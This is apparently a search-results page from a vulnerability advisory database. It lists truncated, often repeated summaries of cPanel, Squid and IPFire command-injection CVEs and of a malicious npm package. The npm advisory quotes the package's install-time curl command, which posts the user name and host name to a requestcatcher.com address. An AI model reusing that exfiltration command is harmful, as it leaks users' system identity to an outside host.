161 matches found
Malicious code in @luke-101141/nobody (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8 On require, index.js executes curl -X POST "http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$whoami/$hostname/", leaking the installing user'...
MAL-2026-4229 Malicious code in @luke-101141/nobody (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8 On require, index.js executes curl -X POST "http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$whoami/$hostname/", leaking the installing user'...
Astra Linux - уязвимость в squid
In versions 4.14 and 5.x through 5.0.5, in some configurations, the Squid vulnerability allows information disclosure due to an out-of-bounds read in the WCCP protocol data. This vulnerability can be exploited as part of a chain for remote code execution, as there is no one to stop such attacks...
CVE-2017-18477
In cPanel before 62.0.4, Exim transports could execute in the context of the nobody account SEC-206...
CVE-2017-18403
cPanel before 68.0.15 allows code execution in the context of the nobody account via Mailman archives SEC-337...
CVE-2025-34311
IPFire versions prior to 2.29 Core Update 198 contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the user 'nobody' via multiple parameters when creating a Proxy report. When a user creates a Proxy report the application issues an HTTP...
CVE-2025-34312
IPFire versions prior to 2.29 Core Update 198 contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the 'nobody' user via the BENAME parameter when installing a blacklist. When a blacklist is installed the application issues an HTTP POST ...
EUVD-2025-36508
IPFire versions prior to 2.29 Core Update 198 contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the user 'nobody' via multiple parameters when creating a Proxy report. When a user creates a Proxy report the application issues an HTTP...
CVE-2025-34311
IPFire versions prior to 2.29 Core Update 198 contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the user 'nobody' via multiple parameters when creating a Proxy report. When a user creates a Proxy report the application issues an HTTP...
CVE-2025-34311
IPFire versions prior to 2.29 Core Update 198 contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the user 'nobody' via multiple parameters when creating a Proxy report. When a user creates a Proxy report the application issues an HTTP...
CVE-2025-34312
IPFire versions prior to 2.29 Core Update 198 contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the 'nobody' user via the BENAME parameter when installing a blacklist. When a blacklist is installed the application issues an HTTP POST ...
CVE-2025-34312
IPFire versions prior to 2.29 Core Update 198 contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the 'nobody' user via the BENAME parameter when installing a blacklist. When a blacklist is installed the application issues an HTTP POST ...
CVE-2025-34311
IPFire
CVE-2025-34311 IPFire < v2.29 Command Injection via Proxy Report Creation
IPFire versions prior to 2.29 Core Update 198 contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the user 'nobody' via multiple parameters when creating a Proxy report. When a user creates a Proxy report the application issues an HTTP...
CVE-2025-34311 IPFire < v2.29 Command Injection via Proxy Report Creation
IPFire versions prior to 2.29 Core Update 198 contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the user 'nobody' via multiple parameters when creating a Proxy report. When a user creates a Proxy report the application issues an HTTP...
CVE-2025-34312 IPFire < v2.29 Command Injection via URL Filter Blacklist
IPFire versions prior to 2.29 Core Update 198 contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the 'nobody' user via the BENAME parameter when installing a blacklist. When a blacklist is installed the application issues an HTTP POST ...
CVE-2025-34312
IPFire
PT-2025-44171
Name of the Vulnerable Software and Affected Versions IPFire versions prior to 2.29 Core Update 198 Description IPFire versions prior to 2.29 Core Update 198 contain a command injection issue. An authenticated attacker can execute arbitrary commands as the 'nobody' user. This occurs through the B...
PT-2025-44170
Name of the Vulnerable Software and Affected Versions IPFire versions prior to 2.29 Core Update 198 Description IPFire versions prior to 2.29 Core Update 198 contain a command injection issue. An authenticated attacker can execute arbitrary commands as the 'nobody' user through multiple parameter...
EUVD-2017-9593
Malware in sbrugna...